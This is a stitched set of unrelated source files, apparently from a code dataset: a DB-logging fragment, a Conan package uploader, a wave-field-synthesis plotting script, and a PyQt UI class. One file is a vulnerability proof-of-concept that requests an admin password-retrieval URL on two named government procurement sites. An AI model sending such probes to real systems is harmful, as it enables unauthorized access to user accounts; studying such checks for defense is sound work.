out = utils.print_latency_stats(total_time, 'E2E', True)
mycol.insert(
{"operation": "finish", "dag_name": dag_name, "result": out, "error": None, "db_size": db_size,
"tx_size": tx_size, "dag_size": dag_size, "zipf": zipf})
return total_time, [], [], 0
|
StarcoderdataPython
|
3279684
|
<reponame>csadsl/poc_exp
#!/usr/bin/evn python
#-*-:coding:utf-8 -*-
#Author:404
#Name: Government procurement system - generic arbitrary user password retrieval vulnerability
#Refer:http://www.wooyun.org/bugs/wooyun-2014-076710
def assign(service,arg):
if service=="zfcgxt":
return True,arg
def audit(arg):
url=arg+"UserSecurityController.do?method=getPassword&step=2&userName=admin"
code,head,res,errcode,_=curl.curl2(url)
    if code == 200 and "usrIsExpired" in res and "usrIsLocked" in res:
security_hole(url)
if __name__=="__main__":
from dummy import *
audit(assign('zfcgxt','http://www.sxzfcg.gov.cn/')[1])
audit(assign('zfcgxt','http://www.tlzbcg.com/')[1])
|
StarcoderdataPython
|
6509159
|
<reponame>datalogics-kam/conan-package-tools<gh_stars>0
class Uploader(object):
def __init__(self, conan_api, remote_manager, auth_manager, printer):
self.conan_api = conan_api
self.remote_manager = remote_manager
self.auth_manager = auth_manager
self.printer = printer
def upload_packages(self, reference, upload):
remote_name = self.remote_manager.upload_remote_name
if not remote_name:
self.printer.print_message("Upload skipped, not upload remote available")
return
if not self.auth_manager.credentials_ready(remote_name):
self.printer.print_message("Upload skipped, credentials for remote '%s' not available" % remote_name)
return
if upload:
self.printer.print_message("Uploading packages for '%s'" % str(reference))
self.auth_manager.login(remote_name)
self.conan_api.upload(str(reference), all_packages=True, remote=remote_name, force=True)
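# Hedged usage sketch (editor's addition): the collaborators are duck-typed, so
# any objects exposing the attributes used in upload_packages() will do. The
# reference string is an illustrative assumption.
def _uploader_sketch(conan_api, remote_manager, auth_manager, printer):
    uploader = Uploader(conan_api, remote_manager, auth_manager, printer)
    uploader.upload_packages("mylib/1.0@user/stable", upload=True)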
|
StarcoderdataPython
|
4903645
|
""" Generates Figure 2a of the the paper
<NAME>, <NAME>, and <NAME>. Non-smooth secondary
source distributions in wave
field synthesis. In German Annual Conference
on Acoustics (DAGA), March 2015.
Sound field synthesized by a semi-infinite rectangular array driven by
two-dimensional WFS for a virtual line source.
"""
import numpy as np
import matplotlib.pyplot as plt
import sfs
# simulation parameters
xref = [0, 0, 0] # reference point
normalization = 0.0577 # normalization used for plotting
dx = 0.10 # secondary source distance
N = 1000 # number of secondary sources for one array
Nr = 10 # number of secondary sources on rounded edge
f = 500 # frequency
omega = 2 * np.pi * f # angular frequency
src_angle = 135
grid = sfs.util.xyz_grid([-2.02, 2], [-2, 2.02], 0, spacing=0.02)
def compute_sound_field(x0, n0, a0, omega, angle):
npw = sfs.util.direction_vector(np.radians(angle), np.radians(90))
xs = xref + (np.sqrt(xref[0]**2 + xref[1]**2) + 4) * np.asarray(npw)
d = sfs.mono.drivingfunction.wfs_2d_line(omega, x0, n0, xs)
a = sfs.mono.drivingfunction.source_selection_point(n0, x0, xs)
twin = sfs.tapering.none(a)
p = sfs.mono.synthesized.generic(omega, x0, n0, d * twin * a0, grid,
source=sfs.mono.source.line)
return p, twin, xs
def plot_objects(ax):
sfs.plot.loudspeaker_2d(x0, n0, np.ones(len(x0)), grid=grid)
sfs.plot.virtualsource_2d(xs, type='point', ax=ax)
sfs.plot.reference_2d(xref, ax=ax)
def plot_sound_field(p, xs, twin, diff=0):
fig = plt.figure()
ax1 = fig.add_axes([0.0, 0.0, 0.7, 1])
im = sfs.plot.soundfield(p, grid, xnorm=None, colorbar=False, vmax=1.5,
vmin=-1.5)
plot_objects(plt.gca())
plt.axis([-3.0, 2.2, -2.2, 3.2])
plt.axis('off')
myfig = plt.gcf()
plt.show()
def plot_sound_field_level(p, xs, twin):
fig = plt.figure()
ax1 = fig.add_axes([0.0, 0.0, 0.7, 1])
im = sfs.plot.level(p, grid, xnorm=None, colorbar=False, vmax=3, vmin=-3)
plot_objects(plt.gca())
plt.annotate('4m', (-2.5, 2), (-2.75, -2.4),
arrowprops={'arrowstyle': '<->'})
plt.axis([-3.0, 2.2, -2.2, 3.2])
plt.axis('off')
ax2 = fig.add_axes([0.55, -0.05, 0.25, 1])
plt.axis('off')
cbar = plt.colorbar(im, ax=ax2, shrink=.7)
cbar.set_label('relative level (dB)', rotation=270, labelpad=10)
myfig = plt.gcf()
plt.show()
# get secondary source positions
x0, n0, a0 = sfs.array.rounded_edge(N, Nr, dx, n0=[0, -1, 0],
center=[-2, 2, 0])
# compute field at the given positions for the given virtual source
p, twin, xs = compute_sound_field(x0, n0, a0, omega, src_angle)
# plot synthesized sound field for multiple virtual source position
plot_sound_field(p/normalization, xs, twin)
plot_sound_field_level(p/normalization, xs, twin)
|
StarcoderdataPython
|
5093695
|
# -*- coding: utf-8 -*-
# File generated according to PCondType12.ui
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_PCondType12(object):
def setupUi(self, PCondType12):
PCondType12.setObjectName("PCondType12")
PCondType12.resize(965, 672)
self.horizontalLayout = QtWidgets.QHBoxLayout(PCondType12)
self.horizontalLayout.setObjectName("horizontalLayout")
self.img_cond = QtWidgets.QLabel(PCondType12)
self.img_cond.setMinimumSize(QtCore.QSize(0, 0))
self.img_cond.setMaximumSize(QtCore.QSize(16777215, 16777215))
self.img_cond.setText("")
self.img_cond.setPixmap(
QtGui.QPixmap(":/images/images/MachineSetup/WindParam/Cond_1_2.PNG")
)
self.img_cond.setScaledContents(True)
self.img_cond.setObjectName("img_cond")
self.horizontalLayout.addWidget(self.img_cond)
self.verticalLayout_2 = QtWidgets.QVBoxLayout()
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.gridLayout = QtWidgets.QGridLayout()
self.gridLayout.setObjectName("gridLayout")
self.in_Nwpc1 = QtWidgets.QLabel(PCondType12)
self.in_Nwpc1.setMinimumSize(QtCore.QSize(60, 0))
self.in_Nwpc1.setObjectName("in_Nwpc1")
self.gridLayout.addWidget(self.in_Nwpc1, 0, 0, 1, 1)
self.si_Nwpc1 = QtWidgets.QSpinBox(PCondType12)
self.si_Nwpc1.setMinimumSize(QtCore.QSize(70, 0))
self.si_Nwpc1.setProperty("value", 99)
self.si_Nwpc1.setObjectName("si_Nwpc1")
self.gridLayout.addWidget(self.si_Nwpc1, 0, 1, 1, 1)
self.in_Wwire = QtWidgets.QLabel(PCondType12)
self.in_Wwire.setMinimumSize(QtCore.QSize(40, 0))
self.in_Wwire.setObjectName("in_Wwire")
self.gridLayout.addWidget(self.in_Wwire, 1, 0, 1, 1)
self.lf_Wwire = FloatEdit(PCondType12)
self.lf_Wwire.setMinimumSize(QtCore.QSize(50, 0))
self.lf_Wwire.setMaximumSize(QtCore.QSize(100, 20))
self.lf_Wwire.setObjectName("lf_Wwire")
self.gridLayout.addWidget(self.lf_Wwire, 1, 1, 1, 1)
self.unit_Wwire = QtWidgets.QLabel(PCondType12)
self.unit_Wwire.setMinimumSize(QtCore.QSize(0, 0))
self.unit_Wwire.setObjectName("unit_Wwire")
self.gridLayout.addWidget(self.unit_Wwire, 1, 2, 1, 1)
self.in_Wins_wire = QtWidgets.QLabel(PCondType12)
self.in_Wins_wire.setMinimumSize(QtCore.QSize(40, 0))
self.in_Wins_wire.setObjectName("in_Wins_wire")
self.gridLayout.addWidget(self.in_Wins_wire, 2, 0, 1, 1)
self.lf_Wins_wire = FloatEdit(PCondType12)
self.lf_Wins_wire.setMinimumSize(QtCore.QSize(50, 0))
self.lf_Wins_wire.setMaximumSize(QtCore.QSize(100, 20))
self.lf_Wins_wire.setObjectName("lf_Wins_wire")
self.gridLayout.addWidget(self.lf_Wins_wire, 2, 1, 1, 1)
self.unit_Wins_wire = QtWidgets.QLabel(PCondType12)
self.unit_Wins_wire.setMinimumSize(QtCore.QSize(0, 0))
self.unit_Wins_wire.setObjectName("unit_Wins_wire")
self.gridLayout.addWidget(self.unit_Wins_wire, 2, 2, 1, 1)
self.in_Wins_cond = QtWidgets.QLabel(PCondType12)
self.in_Wins_cond.setObjectName("in_Wins_cond")
self.gridLayout.addWidget(self.in_Wins_cond, 3, 0, 1, 1)
self.lf_Wins_cond = FloatEdit(PCondType12)
self.lf_Wins_cond.setMinimumSize(QtCore.QSize(50, 0))
self.lf_Wins_cond.setMaximumSize(QtCore.QSize(100, 20))
self.lf_Wins_cond.setObjectName("lf_Wins_cond")
self.gridLayout.addWidget(self.lf_Wins_cond, 3, 1, 1, 1)
self.unit_Wins_cond = QtWidgets.QLabel(PCondType12)
self.unit_Wins_cond.setObjectName("unit_Wins_cond")
self.gridLayout.addWidget(self.unit_Wins_cond, 3, 2, 1, 1)
self.verticalLayout_2.addLayout(self.gridLayout)
self.w_out = WCondOut(PCondType12)
self.w_out.setObjectName("w_out")
self.verticalLayout_2.addWidget(self.w_out)
spacerItem = QtWidgets.QSpacerItem(
20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding
)
self.verticalLayout_2.addItem(spacerItem)
self.horizontalLayout.addLayout(self.verticalLayout_2)
self.retranslateUi(PCondType12)
QtCore.QMetaObject.connectSlotsByName(PCondType12)
PCondType12.setTabOrder(self.si_Nwpc1, self.lf_Wwire)
PCondType12.setTabOrder(self.lf_Wwire, self.lf_Wins_wire)
def retranslateUi(self, PCondType12):
_translate = QtCore.QCoreApplication.translate
PCondType12.setWindowTitle(_translate("PCondType12", "Form"))
self.in_Nwpc1.setText(_translate("PCondType12", "Nwpc1 :"))
self.in_Wwire.setText(_translate("PCondType12", "Wwire :"))
self.unit_Wwire.setText(_translate("PCondType12", "m"))
self.in_Wins_wire.setText(_translate("PCondType12", "Wins_wire :"))
self.unit_Wins_wire.setText(_translate("PCondType12", "m"))
self.in_Wins_cond.setText(_translate("PCondType12", "Wins_cond :"))
self.unit_Wins_cond.setText(_translate("PCondType12", "m"))
from ......GUI.Dialog.DMachineSetup.SWindCond.WCondOut.WCondOut import WCondOut
from ......GUI.Tools.FloatEdit import FloatEdit
from pyleecan.GUI.Resources import pyleecan_rc
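# Hedged usage sketch (editor's addition): the standard pattern for Qt
# Designer-generated classes -- instantiate a plain QWidget and let setupUi()
# populate it. Requires a running QApplication and the pyleecan widgets imported above.
def _pcondtype12_sketch():
    import sys
    app = QtWidgets.QApplication(sys.argv)
    widget = QtWidgets.QWidget()
    ui = Ui_PCondType12()
    ui.setupUi(widget)
    widget.show()
    return app.exec_()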
|
StarcoderdataPython
|